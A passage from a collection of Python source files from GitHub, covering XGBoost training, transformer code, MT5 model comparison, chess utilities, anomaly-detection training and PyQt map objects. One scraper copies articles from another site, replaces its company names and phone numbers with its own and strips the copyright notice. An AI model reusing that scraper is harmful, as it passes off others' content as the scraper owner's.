train_test_split\r\n\r\narray=df_train.values\r\n\r\nX=array[:,0:4]\r\nY=array[:,4]\r\nX_train,X_test,Y_train,Y_test=train_test_split(X,Y,test_size=0.25,random_state=123)\r\n\r\nXg=xgb.XGBRegressor(colsample_bytree=0.9,learning_rate=0.2,max_depth=7,alpha=10,n_estimators=50)\r\n\r\nXg.fit(X_train,Y_train)\r\nXg_pred=Xg.predict(X_test)\r\n\r\n#Computing the RMSE for calculating the mean square error\r\nrmse=np.sqrt(mean_squared_error(Y_test,Xg_pred))\r\n###############################################################################################################\r\n#Deploying the model\r\nimport pickle\r\n# Saving model to disk\r\npickle.dump(Xg, open('FMCG.pkl','wb'))\r\n\r\n# Loading model to compare the results\r\nmodel = pickle.load(open('FMCG.pkl','rb'))\r\n\r\nscore = model.score(X_test, Y_test)\r\nprint(\"Test score: {0:.2f} %\".format(100 * score))\r\nYpredict = model.predict(X_test)\r\n\r\n##########################################################################################################\r\n#Visualizing the original and predicted data in a plot \r\nx_ax = range(len(Y_test))\r\nplt.scatter(x_ax, Y_test, s=5, color=\"blue\", label=\"original\")\r\nplt.plot(x_ax, Xg_pred, lw=0.8, color=\"red\", label=\"predicted\")\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yashraj-96/FMCG","sub_path":"Final model.py","file_name":"Final model.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"4389708464","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport re,os,requests,pymysql\n\nclass Spider:\n def __init__(self, host, user, passwd, db):\n # self.url_set = []\n self.img_path = 'www.7rcm.com'\n self.url = 'http://www.7rcm.com/index.php?r=post/Index&catalog=news_center&page='\n self.host = host\n self.user = user\n self.passwd = passwd\n self.db = db\n self.mysql = pymysql.connect(host=self.host, user=self.user, passwd=self.passwd, db=self.db, charset='utf8',cursorclass=pymysql.cursors.DictCursor)\n self.cursor = self.mysql.cursor()\n\n def run(self):\n try:\n for i in range(71, 73):\n self.GetUrl(self.url+str(i))\n except KeyboardInterrupt as e:\n print('[E] 退出')\n\n\n def Download(self,url):\n file_name = os.path.splitext(url)[0]\n file_suffix = os.path.splitext(url)[1]\n file_list = file_name.split('/')\n img_name = file_list.pop()\n img_brand = file_list.pop()\n img_paths = self.img_path + '/' + img_brand\n if not os.path.exists(img_paths):\n os.mkdir(img_paths)\n filename = '{}/{}{}'.format(img_paths, img_name, file_suffix)\n if not os.path.exists(filename):\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n res = requests.get(url, headers=headers)\n with open(filename, 'wb') as f:\n f.write(res.content)\n return filename\n\n def GetUrl(self,url):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\n }\n req = requests.get(url, headers=headers)\n html = req.content.decode('utf-8')\n for var in re.findall(r'
.*?
', html, re.S):\n pic = re.findall(r'',var,re.S)[0]\n pic_d = 'http://www.7rcm.com/'+ pic.replace('','').replace('\\r\\n', '').replace('\\t', '').replace(' ', '')\n pic = pic.replace('','').replace('\\r\\n', '').replace('\\t', '').replace(' ', '')\n self.Download(pic_d)\n title = re.findall(r'.*?',var,re.S)[0]\n title = '短视频剪辑:'+title.replace('', '').replace('','').replace('\\r\\n', '').replace('\\t', '').replace(' ', '')\n desc = re.findall(r'

.*?

',var,re.S)[0]\n desc = desc.replace('

','').replace('

','').replace('\\r\\n', '').replace('\\t', '').replace('影匠传奇','巨推科技').replace('七人传媒','巨推传媒').replace('010-52907209','010-86399611')\n url = re.findall(r'.*?', html_one, re.S):\n imgObj = re.findall(r'', var, re.S):\n content += content_one.replace('/uploads/','/caiji/').replace('\\r\\n', '').replace('\\t', '').replace('影匠传奇','巨推科技').replace('七人传媒','巨推传媒').replace('010-52907209','010-86399611').replace('
版权声明:本文来源于网络,文章版权属原作者所有。若涉及版权问题,敬请与我们联系删除。
','')\n insertStr = \"'\"+pymysql.escape_string(title)+\"','\"+pic+\"','\"+pymysql.escape_string(content)+\"','\"+pymysql.escape_string(desc)+\"'\"\n sqlStr = 'insert into jutui_content(title,img,content,description) value(' + insertStr + ')'\n self.cursor.execute(sqlStr)\n print(title)\n\nSpider = Spider('127.0.0.1', 'root', '', 'jutui360')\nSpider.run()\n","repo_name":"jobhandsome/python","sub_path":"caiji/www.7rcm.com.py","file_name":"www.7rcm.com.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72166607022","text":"import copy\nfrom turtle import position\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\n\nclass VanillaEncoder(nn.Module):\n\n def __init__(self, d_model=256, nhead=8, num_encoder_layers=6,\n dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super().__init__()\n self.d_model = d_model\n self.nhead = nhead\n\n encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward,\n dropout, activation)\n self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, src, mask, pos_embed, task_encoding, task_mask, task_pos_enc):\n # mask = True if padded\n if not isinstance(src, torch.Tensor):\n src = src[0]\n if not isinstance(mask, torch.Tensor):\n mask = mask[0]\n if not isinstance(pos_embed, torch.Tensor):\n pos_embed = pos_embed[0]\n # flatten NxCxHxW to HWxNxC\n bs, c, h, w = src.shape\n src = src.flatten(2).permute(2, 0, 1)\n pos_embed = pos_embed.flatten(2).permute(2, 0, 1)\n\n mask = mask.flatten(1)\n mask = torch.cat([mask, task_mask], dim=1)\n\n task_encoding = task_encoding.permute(1, 0, 2)\n src = torch.cat([src, task_encoding], dim=0)\n\n task_pos_enc = task_pos_enc.unsqueeze(0).repeat(bs, 1, 1).permute(1, 0, 2)\n pos_embed = torch.cat([pos_embed, task_pos_enc], dim=0)\n\n memory = self.encoder(src, src_key_padding_mask=mask, pos=pos_embed)\n\n return memory.permute(1, 0, 2)\n\n\nclass TransformerEncoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super().__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n\n def with_pos_embed(self, tensor, pos):\n return tensor if pos is None else tensor + pos\n\n def forward(self, src, src_mask=None, src_key_padding_mask=None, pos=None):\n q = k = self.with_pos_embed(src, pos)\n src2 = self.self_attn(q, k, value=src, attn_mask=src_mask,\n key_padding_mask=src_key_padding_mask)[0]\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self, encoder_layer, num_layers):\n super().__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n\n def forward(self, src, mask=None, src_key_padding_mask=None, pos=None):\n output = src\n for layer in self.layers:\n output = layer(output, src_mask=mask, src_key_padding_mask=src_key_padding_mask, pos=pos)\n\n return output\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")\n\n\ndef build_transformer_encoder(args):\n return VanillaEncoder(\n d_model=args.hidden_dim,\n dropout=args.dropout,\n nhead=args.nheads,\n dim_feedforward=args.dim_feedforward,\n num_encoder_layers=args.num_encoder_layers,\n )\n","repo_name":"huangjy-pku/ViTo","sub_path":"model/vito_mdetr/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"17627354563","text":"import cv2\nimport numpy as np\nimport pyautogui\nimport time\nimport serial\nimport serial.tools.list_ports\nports = serial.tools.list_ports.comports()\nfor i in range(10):\n time.sleep(1)\n print(f\"start in {10 - i}\")\n\nportlst = []\nport = \"\"\nduino = False\nfor port, desc, hwid in sorted(ports):\n portlst.append(port)\n print(\"{}: {} [{}]\".format(port, desc, hwid))\n\nif port != \"\":\n arduino = serial.Serial(port=port, baudrate=115200, timeout=.1)\n duino = True\n\ncount = 0\n\nwhile True:\n print(\"searching\")\n ss = pyautogui.screenshot()\n ss.save(r'D:\\echairC\\sadL.png')\n img_rgb = cv2.imread('sadL.png')\n template = cv2.imread('sadboy.png')\n w, h = template.shape[:-1]\n\n res = cv2.matchTemplate(img_rgb, template, cv2.TM_CCOEFF_NORMED)\n threshold = .3\n loc = np.where(res >= threshold)\n for pt in zip(*loc[::-1]): \n print(\"found\")\n if count == 0 and duino == True:\n print(\"b\")\n arduino.write(bytes(\"1\",\"utf-8\"))\n time.sleep(10)\n count += 1\n cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 255, 0), 2)\n count = 0\n\n cv2.imwrite('result.png', img_rgb)\n\n time.sleep(0.1)\n","repo_name":"Jerome-Honer/python-starter-kit","sub_path":"Serialcom/cv2/Serialcv.py","file_name":"Serialcv.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"7564198980","text":"WORDS = ['dog', 'deer', 'deal']\n\n\n# O(N) naive method\n\ndef autocomplete(s):\n results = set()\n for word in WORDS:\n if word.startswith(s):\n results.add(word)\n return results\n\n\nprint(autocomplete('de'))\n\n\n# pre-process the dictionary with Trie structure and search with it. This way, at most O(N) (when every word in dictionary starts with the prefix we are looking for)\nENDS_HERE = '__ENDS_HERE'\n\n\nclass Trie(object):\n def __init__(self):\n self._trie = {}\n\n def insert(self, text):\n trie = self._trie\n for char in text:\n if char not in trie:\n trie[char] = {}\n trie = trie[char]\n trie[ENDS_HERE] = True\n\n def elements(self, prefix):\n d = self._trie\n for char in prefix:\n if char in d:\n d = d[char]\n else:\n return []\n return [prefix + x for x in self._elements(d)]\n\n def _elements(self, d):\n result = []\n for c, v in d.items():\n if c == ENDS_HERE:\n subresult = ['']\n else:\n subresult = [c + s for s in self._elements(v)]\n result.extend(subresult)\n return result\n\n def print_trie(self):\n print(self._trie)\n\n\ntrie = Trie()\nfor word in WORDS:\n trie.insert(word)\n\ndef autocomplete(s):\n return trie.elements(s)\n\n# trie.print_trie()\n\nprint(autocomplete('de'))\n","repo_name":"sj43/Code-Storage","sub_path":"DailyCodingProblem/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"19493240867","text":"# from paddlenlp.transformers.mt5 import MT5Model as PDT5Model\n# # from transformers.models.t5.modeling_t5 import T5Model as PTT5Model\n# from transformers import MT5Model as PTT5Model\n# import torch\n# import paddle\n\n# paddle.set_device(\"cpu\")\n\n# size = \"large\"\n# PREFIX = \"C:/Users/QYS/Desktop/\"\n# pt_model = PTT5Model.from_pretrained(f\"{PREFIX}torch/mt5-{size}\")\n# pt_model.eval()\n# pd_model = PDT5Model.from_pretrained(\"mt5-large\")\n# pd_model.eval()\n\n# with paddle.no_grad():\n# pd_outputs = pd_model(\n# **pd_model.dummy_inputs,return_dict=True\n# ).last_hidden_state\n\n# with torch.no_grad():\n# pt_outputs = pt_model(\n# **pt_model.dummy_inputs\n# ).last_hidden_state\n\n\n# def compare(a, b):\n# a = torch.tensor(a.numpy()).float()\n# b = torch.tensor(b.numpy()).float()\n# meandif = (a - b).abs().mean()\n# maxdif = (a - b).abs().max()\n# print(\"mean difference:\", meandif)\n# print(\"max difference:\", maxdif)\n\n\n# compare(pd_outputs, pt_outputs)\n\narticle = \"UN Offizier sagt, dass weiter verhandelt werden muss in Syrien.\"\nsummary = \"Weiter Verhandlung in Syrien.\"\n\n\n# torch output\nimport torch\nimport transformers\nfrom transformers import MT5Model, T5Tokenizer\n\nPREFIX = \"C:/Users/QYS/Desktop/\"\ntorch_model = MT5Model.from_pretrained(f\"{PREFIX}torch/mt5-large\")\ntorch_tokenizer = T5Tokenizer.from_pretrained(\"google/mt5-large\")\ntorch_model.eval()\n# print(\"111\",torch_model.dummy_inputs)\n\ntorch_inputs = torch_tokenizer(article, return_tensors=\"pt\")\nwith torch_tokenizer.as_target_tokenizer():\n labels = torch_tokenizer(summary, return_tensors=\"pt\")\nprint(\"input\", torch_inputs)\nprint(\"labels\", labels)\ntorch_outputs = torch_model(input_ids=torch_inputs[\"input_ids\"], decoder_input_ids=labels[\"input_ids\"])\n# print(\"output\", torch_outputs)\ntorch_logits = torch_outputs.last_hidden_state\ntorch_array = torch_logits.cpu().detach().numpy()\nprint(\"torch_prediction_logits shape:{}\".format(torch_array.shape))\nprint(\"torch_prediction_logits:{}\".format(torch_array))\n\n\n# paddle output\nimport paddle\nimport paddlenlp\nfrom paddlenlp.transformers.mt5 import MT5Model, T5Tokenizer\nimport numpy as np\n\n# paddle_model = BertForPretraining.from_pretrained(paddle_model_name)\npaddle_model = MT5Model.from_pretrained(\"mt5-large\")\npaddle_tokenizer = T5Tokenizer.from_pretrained(\"t5-large\")\npaddle_model.eval()\n# print(\"111\",paddle_model.dummy_inputs)\n\npaddle_inputs = paddle_tokenizer(article)\nlabels = paddle_tokenizer(summary)\n\npaddle_inputs = {k:paddle.to_tensor([v]) for (k, v) in paddle_inputs.items()}\nlabels = {k:paddle.to_tensor([v]) for (k, v) in labels.items()}\nprint(\"input\", paddle_inputs)\nprint(\"labels\", labels)\npaddle_outputs = paddle_model(input_ids=paddle_inputs[\"input_ids\"], decoder_input_ids=labels[\"input_ids\"],return_dict=True)\n# print(\"output\", paddle_outputs)\npaddle_logits = paddle_outputs.last_hidden_state\npaddle_array = paddle_logits.numpy()\nprint(\"paddle_prediction_logits shape:{}\".format(paddle_array.shape))\nprint(\"paddle_prediction_logits:{}\".format(paddle_array))\n\n\n# the output logits should have the same shape\nassert torch_array.shape == paddle_array.shape, \"the output logits should have the same shape, but got : {} and {} instead\".format(torch_array.shape, paddle_array.shape)\ndiff = torch_array - paddle_array\nprint(np.amax(abs(diff)))\nprint(np.mean(abs(diff)))\n","repo_name":"27182812/MT5_paddle","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"12036813728","text":"import numpy as np\n\n\ndef divide_cube(cube):\n x_mid = cube['x_min'] + (cube['x_max'] - cube['x_min']) / 2\n y_mid = cube['y_min'] + (cube['y_max'] - cube['y_min']) / 2\n z_mid = cube['z_min'] + (cube['z_max'] - cube['z_min']) / 2\n cubes = {0: {'x_min': cube['x_min'], 'y_min': cube['y_min'], 'z_min': cube['z_min'], 'x_max': x_mid, 'y_max': y_mid,\n 'z_max': z_mid},\n 1: {'x_min': x_mid, 'y_min': cube['y_min'], 'z_min': cube['z_min'], 'x_max': cube['x_max'], 'y_max': y_mid,\n 'z_max': z_mid},\n 2: {'x_min': cube['x_min'], 'y_min': y_mid, 'z_min': cube['z_min'], 'x_max': x_mid, 'y_max': cube['y_max'],\n 'z_max': z_mid},\n 3: {'x_min': x_mid, 'y_min': y_mid, 'z_min': cube['z_min'], 'x_max': cube['x_max'], 'y_max': cube['y_max'],\n 'z_max': z_mid},\n 4: {'x_min': cube['x_min'], 'y_min': cube['y_min'], 'z_min': z_mid, 'x_max': x_mid, 'y_max': y_mid,\n 'z_max': cube['z_max']},\n 5: {'x_min': x_mid, 'y_min': cube['y_min'], 'z_min': z_mid, 'x_max': cube['x_max'], 'y_max': y_mid,\n 'z_max': cube['z_max']},\n 6: {'x_min': cube['x_min'], 'y_min': y_mid, 'z_min': z_mid, 'x_max': x_mid, 'y_max': cube['y_max'],\n 'z_max': cube['z_max']},\n 7: {'x_min': x_mid, 'y_min': y_mid, 'z_min': z_mid, 'x_max': cube['x_max'], 'y_max': cube['y_max'],\n 'z_max': cube['z_max']}}\n return cubes\n\n\ndef in_cube(points, cube):\n \"\"\"\n\n :param points:\n :param cube:\n :return:\n \"\"\"\n x = np.array([item[0] for item in points])\n y = np.array([item[1] for item in points])\n z = np.array([item[2] for item in points])\n x_flag = np.logical_and(x >= cube['x_min'], x < cube['x_max'])\n y_flag = np.logical_and(y >= cube['y_min'], y < cube['y_max'])\n z_flag = np.logical_and(z >= cube['z_min'], z < cube['z_max'])\n flag = np.logical_and(np.logical_and(x_flag, y_flag), z_flag)\n points_in = []\n for point, flag in zip(points, flag):\n if flag:\n points_in.append(point)\n return points_in, len(points_in)\n\n\ndef compute_max_cube(points):\n cm = [np.mean([item[0] for item in points]), np.mean([item[1] for item in points]),\n np.mean([item[2] for item in points])]\n max_dim = np.abs(max([item[0] for item in points]) - cm[0])\n max_dim = max(np.abs(min([item[0] for item in points]) - cm[0]), max_dim)\n max_dim = max(np.abs(max([item[1] for item in points]) - cm[1]), max_dim)\n max_dim = max(np.abs(min([item[1] for item in points]) - cm[1]), max_dim)\n max_dim = max(np.abs(max([item[2] for item in points]) - cm[2]), max_dim)\n max_dim = max(np.abs(min([item[2] for item in points]) - cm[2]), max_dim)\n cube = {'x_max': cm[0] + max_dim, 'x_min': cm[0] - max_dim, 'y_max': cm[1] + max_dim, 'y_min': cm[1] - max_dim,\n 'z_max': cm[2] + max_dim, 'z_min': cm[2] - max_dim}\n return cube\n\n\ndef get_points_from_mesh(pw):\n x = [pw['par']['a'][0], pw['par']['b'][0], pw['par']['c'][0], pw['par']['d'][0]]\n y = [pw['par']['a'][1], pw['par']['b'][1], pw['par']['c'][1], pw['par']['d'][1]]\n z = [pw['par']['a'][2], pw['par']['b'][2], pw['par']['c'][2], pw['par']['d'][2]]\n return x, y, z\n","repo_name":"tkucner/3D_MDR_examples","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20911871385","text":"# util.py\n# Has some miscellaneous utilities used throughout this program\n\n# Due to how this code is written indexing a space in the board is done [number][letter] like ['1']['a'] meaning a1\n# Dictionaries used to convert between strings like 'a4' to indexes like [5][0]\nboard_to_space = {\n 'a': 0,\n 'b': 1,\n 'c': 2,\n 'd': 3,\n 'e': 4,\n 'f': 5,\n 'g': 6,\n 'h': 7,\n '1': 0,\n '2': 1,\n '3': 2,\n '4': 3,\n '5': 4,\n '6': 5,\n '7': 6,\n '8': 7\n}\ndef str_to_space(space_str):\n space = [board_to_space[space_str[1]], board_to_space[space_str[0]]]\n return space\n\ncol_to_board = {\n 0: '1',\n 1: '2',\n 2: '3',\n 3: '4',\n 4: '5',\n 5: '6',\n 6: '7',\n 7: '8',\n}\nrow_to_board = {\n 0: 'a',\n 1: 'b',\n 2: 'c',\n 3: 'd',\n 4: 'e',\n 5: 'f',\n 6: 'g',\n 7: 'h',\n}\n\n# Most of the time colors are represented by their character abbreviations\n# This dict allows us to convert back easily their names\ncolor_abr_to_name = {\n 'w': 'white',\n 'b': 'black',\n ' ': ' '\n}\n\n# Stuff used for empty spaces/pieces (changing these has not been tested)\nempty_abr = ' '\nempty_color = ' '\n\n# This was needed to create lambdas in a loop for each button in gui\n# using lambda: obj(param) in the loop led to one lambda being used for all buttons\ndef create_lambda(obj, param):\n return lambda: obj(param)\n\ndef get_lower(num1, num2):\n if num1 < num2:\n return num1\n else:\n return num2\n\n# Stops negative indexing and IndexErrors used extensively in chess_pieces\ndef has_index2D(list, index_1, index_2):\n if index_1 < 0 or index_2 < 0:\n return False\n try:\n list[index_1][index_2]\n return True\n except IndexError:\n return False\n","repo_name":"remton/Python_Chess","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"18850064389","text":"import sys\n\nsys.path.append('../../')\n\n# other imports\n\nimport torch.utils.data\n\nfrom examples.self_supervised.dataContainer import *\n#from torch.profiler import profile, record_function, ProfilerActivity\n\nclass modelBuilder():\n\n def __init__(self, input_channels, output_channels):\n self.input_channels = input_channels\n self.output_channels = output_channels\n\n def generate(self, model_name, config):\n print(\"Creating network\")\n if model_name == \"CompositeNet\":\n from networks.network_classif import MCConpositeNet as Net\n return Net(self.input_channels, self.output_channels, config).float()\n\n else:\n from networks.network_classif import MCConvPoint as Net\n return Net(self.input_channels, self.output_channels).float()\n\nclass Trainer():\n\n def __init__(self, dataContainer, net, config, folderName=None):\n\n self.N_LABELS = len(dataContainer.getTransformationList())\n self.labels_list = dataContainer.getTransformationList()\n self.config = config\n self.softmax = nn.Softmax(dim=1)\n config[\"n_parameters\"] = self.count_parameters(net)\n self.warm_up_n_epochs = config[\"warm_up_n_epochs\"]\n # define the save directory\n if folderName == None:\n time_string = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n folderName = \"{}_bs{:02d}_pts{}_{}\".format(config['architecture'], config['batchsize'], config['npoints'], time_string)\n # self.save_dir = os.path.join(config['savedir'], folderName)\n time_string = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n self.save_dir = os.path.join(\n folderName,\n \"Experiment_{}\".format(time_string))\n # setting stuff for trainer\n if config['cuda']:\n net.cuda()\n print(\"Number of parameters\", self.count_parameters(net))\n self.net = net\n self.train_loader, self.test_loader = dataContainer.getDataLoader(\n numPts=config['npoints'],\n threads=0,\n batchSize=config['batchsize']\n )\n\n self.rocs = []\n self.aucs = []\n\n self.test_data = dataContainer.getTestData()\n self.test_labels = dataContainer.getTestLabels()\n self.optimizer = torch.optim.Adam(net.parameters(), lr=1e-4)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, config[\"schedule\"], gamma=0.1) # gamma=0.5 [20, 35, 50, 70], gamma=0.5 ) [30, 45, 75]\n\n\n def init_logs(self):\n\n print(os.getcwd())\n os.makedirs(self.save_dir, exist_ok=True)\n logFile = open(os.path.join(self.save_dir, \"logs.txt\"), \"w\")\n configFile = open(os.path.join(self.save_dir, \"config.txt\"), \"w\")\n configFile.write(str(self.config))\n print(\"creating save folder\")\n print(logFile)\n return logFile\n\n def normality_score(self, O):\n # [N, N_T, N_T]\n diags = torch.diagonal(O, offset=0, dim1=1, dim2=2)\n means = torch.mean(diags, 1)\n return means\n\n def train(self, epoch_nbr=100):\n\n f = self.init_logs()\n for epoch in range(epoch_nbr):\n # TRAIN\n self.net.train()\n train_aloss, train_oa, train_aa = self.apply(epoch, training=True)\n # TEST\n self.net.eval()\n self.net.eval()\n if (epoch >= self.warm_up_n_epochs):\n with torch.no_grad():\n test_auc, roc, self.outputs = self.apply(epoch, training=False)\n self.rocs.append(roc)\n self.aucs.append(float(test_auc))\n # save network\n torch.save(self.net.state_dict(), os.path.join(self.save_dir, \"state_dict.pth\"))\n else:\n test_auc = \"NaN\"\n # write the logs\n f.write(str(epoch) + \",\")\n f.write(train_aloss + \",\")\n f.write(test_auc + \"\\n\")\n f.flush()\n\n self.scheduler.step()\n f.close()\n\n def apply(self, epoch, training=False):\n\n ''' Applies the function learnt by self.net over the input provided\n \t\tby train and test loaders\n\n \t\tParameters:\n \t\t-----------\n \t\tepoch : int, used for logging purposes.\n \t\ttraining : bool, if True we perform the backward pass,\n \t\t\t\t\t\t if False we compute test metrics.\n \t'''\n error = 0\n cm = np.zeros((self.N_LABELS, self.N_LABELS))\n # ___________________________________________________________\n #\n # Training phase: weights are updated, returned metrics are\n #\tonly training_loss, training_OA, training_AA.\n # ___________________________________________________________\n #\n if training:\n t = tqdm(self.train_loader, desc=\"Epoch \" + str(epoch), ncols=130)\n for pts, features, Rs, _ , target_transform, indices in t:\n if self.config['cuda']:\n Rs = Rs.cuda()\n features = features.cuda()\n target_transform = target_transform.cuda()\n pts = pts.cuda()\n self.optimizer.zero_grad()\n # FORWARD\n pts = torch.bmm(pts, Rs)\n outputs = self.net(features, pts)\n target_transform = target_transform.view(-1)\n # BACKWARD STEP\n loss = F.cross_entropy(outputs, target_transform)\n loss.backward()\n self.optimizer.step()\n # METRICS IN TQDM PROGRESS BAR\n predicted_class = np.argmax(outputs.cpu().detach().numpy(), axis=1)\n target_np = target_transform.cpu().numpy()\n cm_ = confusion_matrix(target_np.ravel(), predicted_class.ravel(), labels=list(range(self.N_LABELS)))\n cm += cm_\n error += loss.item()\n oa = \"{:.5f}\".format(metrics.stats_overall_accuracy(cm))\n aa = \"{:.5f}\".format(metrics.stats_accuracy_per_class(cm)[0])\n aiou = \"{:.5f}\".format(metrics.stats_iou_per_class(cm)[0])\n aloss = \"{:.5e}\".format(error / cm.sum())\n t.set_postfix(OA=oa, AA=aa, AIOU=aiou, ALoss=aloss)\n\n return aloss, oa, aa\n # ___________________________________________________________\n #\n # Testing phase: weights are not updated, returned metrics are\n #\tloss, OA, AA, AAUC, OAUC (see:\n # \thttps://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_auc_score.html\n # ___________________________________________________________\n #\n else:\n times_list = []\n anomaly_scores = np.zeros((self.test_data.shape[0]), dtype=float)\n t = tqdm(self.test_loader, desc=\" Test \" + str(epoch), ncols=100)\n for pts, features, Rs, targets, targets_transform, indices in t:\n if self.config['cuda']:\n features = features.cuda()\n Rs = Rs.cuda()\n # target_transform = targets_transform.cuda()\n pts = pts.cuda()\n # targets = targets.cuda()\n # FEEDING INPUT\n pts = torch.bmm(pts, Rs)\n outputs = self.net(features, pts)\n outputs = self.softmax(outputs)\n # [N * N_T, N_T ] --> [ N, N_T, N_T ]\n outputs = outputs.view(-1, self.N_LABELS, self.N_LABELS)\n batch_scores = - self.normality_score(outputs)\n batch_scores = batch_scores.cpu().detach().numpy()\n for i in range(0, indices.size(0), self.N_LABELS):\n\n anomaly_scores[indices[i]] += batch_scores[i // self.N_LABELS]\n\n print(self.test_labels)\n print(anomaly_scores.shape)\n auc = \"{:.4f}\".format(metrics.roc_auc_score(self.test_labels, anomaly_scores))\n print(\"Predictions\", \"AUC\", auc)\n # \"AA\", aa,\n # \"IOU\", aiou,\n # \"normAcc\", normAcc,\n # \"anomAcc\", anomAcc)\n roc_fpr, roc_tpr, roc_thr = metrics.roc_curve(self.test_labels, anomaly_scores)\n return auc, [roc_fpr, roc_tpr, roc_thr], anomaly_scores\n\n def count_parameters(self, model):\n parameters = model.parameters()\n return sum(p.numel() for p in parameters if p.requires_grad)\n","repo_name":"sirolf-otrebla/CompositeNet","sub_path":"examples/self_supervised/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":8394,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"} +{"seq_id":"72406114864","text":"import pandas as pd\nfrom Bio import SeqIO\nfile = open(snakemake.output[0],\"w\")\ndf = pd.read_csv(snakemake.input[0],sep =\",\")\nhitlist = []\norganismlist = []\nfor i in range(len(df)):\n if df.loc[i,'qseqid'] == snakemake.params[0] :\n hitlist.append(df.loc[i,'sseqid'])\n organismlist.append(df.loc[i,'Organism'])\ndico = {}\nprotein = snakemake.input[1]\nfasta_sequences = SeqIO.parse(open(protein),'fasta')\nfor fasta in fasta_sequences:\n name, sequence = fasta.id, str(fasta.seq)\n dico[name]=sequence\nfor i in range(len(hitlist)):\n if hitlist[i] in list(dico.keys()):\n file.write(\">\")\n file.write(hitlist[i])\n file.write(\" \")\n file.write(organismlist[i])\n file.write(\"\\n\")\n file.write(dico[hitlist[i]])\n file.write(\"\\n\")\nfile.close()\n","repo_name":"fmangane/perfom_filter_blast","sub_path":"scripts/genes_fasta_collector.py","file_name":"genes_fasta_collector.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9503229079","text":"'''\nCreated on 02.11.2011\n\n@author: michi\n'''\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QGraphicsSimpleTextItem, QTransform\n\nfrom geotiledmapobjectinfo import GeoTiledMapObjectInfo #@UnresolvedImport\n\nclass GeoTiledMapTextObjectInfo(GeoTiledMapObjectInfo):\n def __init__(self, mapData, mapObject):\n self.text = mapObject\n GeoTiledMapObjectInfo.__init__(self, mapData, mapObject)\n self.text.textChanged.connect(self.textChanged)\n self.text.fontChanged.connect(self.fontChanged)\n self.text.penChanged.connect(self.penChanged)\n self.text.brushChanged.connect(self.brushChanged)\n self.text.offsetChanged.connect(self.offsetChanged)\n self.text.alignmentChanged.connect(self.alignmentChanged)\n \n self.textItem = QGraphicsSimpleTextItem()\n self.graphicsItem = self.textItem\n \n self.penChanged(self.text.pen())\n self.brushChanged(self.text.brush())\n self.originChanged(self.text.origin())\n self.fontChanged(self.text.font())\n self.textChanged(self.text.text())\n \n def textChanged(self, text):\n self.textItem.setText(self.text.text())\n 